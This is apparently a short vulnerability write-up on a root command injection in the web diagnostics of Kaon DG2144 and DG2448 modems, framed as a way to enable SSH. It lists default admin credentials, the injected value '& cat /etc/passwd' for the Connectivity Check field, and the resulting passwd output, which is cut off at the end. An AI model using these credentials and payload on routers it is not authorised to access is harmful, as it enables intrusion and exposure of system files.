Kaon DG2144 : Root Command Injection Exploit ( How To Enable SSH )
Kaon DG2144 : Root Command Injection Exploit ( How To Enable SSH ) Kaon Dg2448 & Kaon DG2144 Upon analyzing the modems Web service, it is evident that the functions accessible through the URLs: http://192.168.1.1/#/home/administration and http://192.168.1.1/#/home/status are vulnerable to command execution as root. The specific functions susceptible to this vulnerability are Ping, Traceroute, NsLookup under Diagnostics, and Target under Connectivity Check as well as Numerous others. To exploit this vulnerability, a user must be logged in with the credentials: Username: admin Password: admin@DG2144 By navigating to the Connectivity Check section on the main page and injecting the command '& cat /etc/passwd', sensitive information such as user details can be retrieved. The obtained data includes the root user's information: root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false ... admin:x:0:0::/home/adm